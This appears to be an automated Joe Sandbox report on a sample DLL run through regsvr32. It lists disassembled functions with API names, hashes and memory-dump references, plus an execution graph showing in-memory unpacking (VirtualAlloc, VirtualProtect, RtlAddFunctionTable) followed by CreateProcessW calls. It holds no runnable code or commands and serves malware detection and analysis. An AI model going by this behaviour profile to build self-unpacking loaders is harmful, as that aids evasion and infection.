                                                                      Similarity
                                                                      • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                      • String ID:
                                                                      • API String ID: 3106088686-0
                                                                      • Opcode ID: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                      • Instruction ID: 1993135a33258d59ffd43ea5ab06a1cb9bde92a77f78e6b8a557dac66f017d74
                                                                      • Opcode Fuzzy Hash: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                      • Instruction Fuzzy Hash: 42014424A09B83C6FB64AB659C4513862E2FF4A7A0B5CC634D96E02BDDDF7CE484D710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free$ErrorFreeHeapLast_errno
                                                                      • String ID:
                                                                      • API String ID: 1012874770-0
                                                                      • Opcode ID: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                      • Instruction ID: a1caf652c2cd1739567276f0bb7391f11962e54f3cc726eba39ecf506dcc5c26
                                                                      • Opcode Fuzzy Hash: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                      • Instruction Fuzzy Hash: ED01D612E09442D1EE68DBA1DD9203813E1EF82704F5C9031D64E42D9ACFE9F8919390
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free
                                                                      • String ID:
                                                                      • API String ID: 1294909896-0
                                                                      • Opcode ID: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                      • Instruction ID: 04f5b342856782462c99f96a1031ca389a78bdbbc984d4d97839f5f1b48f98e1
                                                                      • Opcode Fuzzy Hash: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                      • Instruction Fuzzy Hash: 40B18E32B19B82C5EB20DB62E8405AE77E1FB86744F488531EA8E43B89DFBCD515D740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free$Sleep_errno
                                                                      • String ID:
                                                                      • API String ID: 2081351063-0
                                                                      • Opcode ID: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                      • Instruction ID: 6a405a5bc5d26e49f9bedefe05eb9a6ae1fb8b44994b7eb184291c56484121cb
                                                                      • Opcode Fuzzy Hash: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                      • Instruction Fuzzy Hash: A0310861A08682C5EF59AB25CD5227966E1EF86FC4F4CC035DE0D07B9EDFACE850A340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DecodePointer.KERNEL32(?,?,?,00007FFA526A73E5,?,?,?,?,00007FFA526A34D2,?,?,?,00007FFA526A21CB), ref: 00007FFA526A72FD
                                                                      • DecodePointer.KERNEL32(?,?,?,00007FFA526A73E5,?,?,?,?,00007FFA526A34D2,?,?,?,00007FFA526A21CB), ref: 00007FFA526A730C
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFA526A73E5,?,?,?,?,00007FFA526A34D2,?,?,?,00007FFA526A21CB), ref: 00007FFA526A7389
                                                                        • Part of subcall function 00007FFA526A318C: realloc.LIBCMT ref: 00007FFA526A31B7
                                                                        • Part of subcall function 00007FFA526A318C: Sleep.KERNEL32(?,?,00000000,00007FFA526A7379,?,?,?,00007FFA526A73E5,?,?,?,?,00007FFA526A34D2), ref: 00007FFA526A31D3
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFA526A73E5,?,?,?,?,00007FFA526A34D2,?,?,?,00007FFA526A21CB), ref: 00007FFA526A7398
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFA526A73E5,?,?,?,?,00007FFA526A34D2,?,?,?,00007FFA526A21CB), ref: 00007FFA526A73A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                      • String ID:
                                                                      • API String ID: 1310268301-0
                                                                      • Opcode ID: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                      • Instruction ID: e2cb18eef185c41f82f3f9b9c81ed09e4fbbe5ab0baee37e0943fd427377c1ba
                                                                      • Opcode Fuzzy Hash: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                      • Instruction Fuzzy Hash: 61214F11B4A682D1EA55AB61ED8407EA2D2FB86BC0B488435DD0E0BF5EDFBCE4859301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                      • String ID:
                                                                      • API String ID: 1310268301-0
                                                                      • Opcode ID: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                      • Instruction ID: 18c5c4b05e9c7b0b971b948349a17ee5459222e6321903eb0bf28cfcaa419202
                                                                      • Opcode Fuzzy Hash: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                      • Instruction Fuzzy Hash: 7A218021B49682D4EE45EB11AD84179A2D2EB46BC0F4C8535ED4E07F5EDFBCE495D300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FFA526A3359,?,?,00000028,00007FFA526A6C7D,?,?,00000000,00007FFA526A30C0,?,?,00000000,00007FFA526A6B19), ref: 00007FFA526A331F
                                                                      • GetProcAddress.KERNEL32(?,?,000000FF,00007FFA526A3359,?,?,00000028,00007FFA526A6C7D,?,?,00000000,00007FFA526A30C0,?,?,00000000,00007FFA526A6B19), ref: 00007FFA526A3334
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 1646373207-1276376045
                                                                      • Opcode ID: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                      • Instruction ID: ba1d0c363cf9ff246416a9f4da87591e755b5f83ee45e11bc15510350eb1bdd3
                                                                      • Opcode Fuzzy Hash: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                      • Instruction Fuzzy Hash: FAE01250F2D64281FE195B50AC8413413D0EF9AB11B4CD438D81F06BA8DFECA6A9C310
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00007FFA526A309C: Sleep.KERNEL32(?,?,00000000,00007FFA526A6B19,?,?,00000000,00007FFA526A6BC3,?,?,?,?,?,?,00000000,00007FFA526A2DC8), ref: 00007FFA526A30D2
                                                                      • free.LIBCMT ref: 00007FFA526A58A5
                                                                      • free.LIBCMT ref: 00007FFA526A58C1
                                                                        • Part of subcall function 00007FFA526A6550: RtlCaptureContext.KERNEL32 ref: 00007FFA526A658F
                                                                        • Part of subcall function 00007FFA526A6550: IsDebuggerPresent.KERNEL32 ref: 00007FFA526A662D
                                                                        • Part of subcall function 00007FFA526A6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFA526A6637
                                                                        • Part of subcall function 00007FFA526A6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFA526A6642
                                                                        • Part of subcall function 00007FFA526A6550: GetCurrentProcess.KERNEL32 ref: 00007FFA526A6658
                                                                        • Part of subcall function 00007FFA526A6550: TerminateProcess.KERNEL32 ref: 00007FFA526A6666
                                                                      • free.LIBCMT ref: 00007FFA526A58D6
                                                                        • Part of subcall function 00007FFA526A3024: HeapFree.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A303A
                                                                        • Part of subcall function 00007FFA526A3024: _errno.LIBCMT ref: 00007FFA526A3044
                                                                        • Part of subcall function 00007FFA526A3024: GetLastError.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A304C
                                                                      • free.LIBCMT ref: 00007FFA526A58F5
                                                                      • free.LIBCMT ref: 00007FFA526A5911
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentSleepTerminate
                                                                      • String ID:
                                                                      • API String ID: 2294642566-0
                                                                      • Opcode ID: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                      • Instruction ID: db44630e4e44c0476cb108e3fe63efdbb5cd4162e9967c5a55eb99197c5aabc1
                                                                      • Opcode Fuzzy Hash: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                      • Instruction Fuzzy Hash: 61516C36A04A9182EB20DF2AEC1116A63E5FB85BA8F5C8035DE4D47B98DF7CD946D340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _getptd
                                                                      • String ID:
                                                                      • API String ID: 3186804695-0
                                                                      • Opcode ID: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                      • Instruction ID: 7c083b11208101437a8ba6efae211f2ebdac1b5e4f0c1caf2b5dfabfabf114ba
                                                                      • Opcode Fuzzy Hash: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                      • Instruction Fuzzy Hash: 4D819E72A09682D6DB24DF25E9846AAB3E0FB45784F548136DB8D47F98EF7CE450CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _lock$DecodePointer_errno_getptd
                                                                      • String ID:
                                                                      • API String ID: 4201827665-0
                                                                      • Opcode ID: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                      • Instruction ID: 36795cb0a5a36718e4783a34e3079a13bf758420d2d911f0ad926f2d7d9c7076
                                                                      • Opcode Fuzzy Hash: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                      • Instruction Fuzzy Hash: BB514721A09682C6FB54EB25AC517BA22D1FF46784F18C039DA9E47F9ADFBCE4419700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$DecodePointercalloc
                                                                      • String ID:
                                                                      • API String ID: 1531210114-0
                                                                      • Opcode ID: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                      • Instruction ID: af9338266489549f771f14716c1f78fca6ae1d400bf8fa080579def765bbfc84
                                                                      • Opcode Fuzzy Hash: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                      • Instruction Fuzzy Hash: CB219D22A18A47C5FB149F65A8113BA62D0EF86780F0CC534EB4D07F9EDFBDE8109601
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _lock.LIBCMT ref: 00007FFA526A53B2
                                                                      • free.LIBCMT ref: 00007FFA526A53D7
                                                                        • Part of subcall function 00007FFA526A3024: HeapFree.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A303A
                                                                        • Part of subcall function 00007FFA526A3024: _errno.LIBCMT ref: 00007FFA526A3044
                                                                        • Part of subcall function 00007FFA526A3024: GetLastError.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A304C
                                                                      • _lock.LIBCMT ref: 00007FFA526A53F2
                                                                      • free.LIBCMT ref: 00007FFA526A5438
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _lockfree$ErrorFreeHeapLast_errno
                                                                      • String ID:
                                                                      • API String ID: 3188102813-0
                                                                      • Opcode ID: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                      • Instruction ID: 786148b2195335fd14c9c6ca4427019a01e1db8591fa6a606bc9fd00105c2633
                                                                      • Opcode Fuzzy Hash: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                      • Instruction Fuzzy Hash: 63112A21E0A542C6FF589BA1DC2137822D0EF82704F0CD535D71E56ADAEFACA851A321
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalDeleteSection$Freefree
                                                                      • String ID:
                                                                      • API String ID: 1250194111-0
                                                                      • Opcode ID: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                      • Instruction ID: c62576aedb2e76d51a74fb5d3dd2e7cc42cbd458574480dd3a5230bc4c328ce3
                                                                      • Opcode Fuzzy Hash: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                      • Instruction Fuzzy Hash: 22113D31E09A92C6EA189B15ED4513863E0FB46B54F5CC531DB6E02E9DCFBCE5919700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _lock$Sleep_errno_getptd
                                                                      • String ID:
                                                                      • API String ID: 2111406555-0
                                                                      • Opcode ID: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                      • Instruction ID: 1e2b9253792eaeef13d6e4f4f4955f892f79ee458d83dfea0882a27dd7d24199
                                                                      • Opcode Fuzzy Hash: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                      • Instruction Fuzzy Hash: 75015221A09682C6FB44AB75DC517AD62D0EF46784F48C034D71D17BCBCF6CE8609351
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$_getptd
                                                                      • String ID: #
                                                                      • API String ID: 3432092939-1885708031
                                                                      • Opcode ID: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                      • Instruction ID: 1c93d08eb0c5c4ade141e6bbc1fa0ff219030f856b34cfe0d9f465de36549284
                                                                      • Opcode Fuzzy Hash: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                      • Instruction Fuzzy Hash: 2C519222A0D685C9D7609F14E8402BEABE0F793B40F5C8131DA9D13B99CFBDD851DB01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free
                                                                      • String ID:
                                                                      • API String ID: 1294909896-0
                                                                      • Opcode ID: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                      • Instruction ID: 4dba464fe53d3be1709e452e930643b7f2478781f180fadcfece2d54aed95375
                                                                      • Opcode Fuzzy Hash: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                      • Instruction Fuzzy Hash: DF519532A09A81C5DB64AF11A8811BD77D0FB46B84F688531DB9E07B89CFBCE552D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,$,$2S=$i`}G
                                                                      • API String ID: 0-4285990414
                                                                      • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                      • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                      • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                      • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:12.9%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:32
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 3440 18000ac48 3443 18000ac8e 3440->3443 3442 18000b6ec 3443->3442 3444 180021c3c 3443->3444 3445 180021c97 3444->3445 3446 180001bdc CreateProcessW 3445->3446 3447 180021e38 3446->3447 3447->3442 3448 180003598 3451 180003640 3448->3451 3449 1800044c0 3450 180021c3c CreateProcessW 3450->3451 3451->3449 3451->3450 3422 180021c3c 3423 180021c97 3422->3423 3426 180001bdc 3423->3426 3425 180021e38 3427 180001c82 3426->3427 3428 180001d21 CreateProcessW 3427->3428 3428->3425 3429 230423b0000 3430 230423b0183 3429->3430 3431 230423b043e VirtualAlloc 3430->3431 3432 230423b0462 3431->3432 3433 230423b0531 GetNativeSystemInfo 3432->3433 3435 230423b0a7b 3432->3435 3434 230423b056d VirtualAlloc 3433->3434 3433->3435 3438 230423b058b 3434->3438 3436 230423b0a00 3436->3435 3437 230423b0a56 RtlAddFunctionTable 3436->3437 3437->3435 3438->3436 3439 230423b09d9 VirtualProtect 3438->3439 3439->3438 3452 1800097c0 3455 1800097fc 3452->3455 3453 180021c3c CreateProcessW 3454 180009924 3453->3454 3455->3453 3455->3454

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
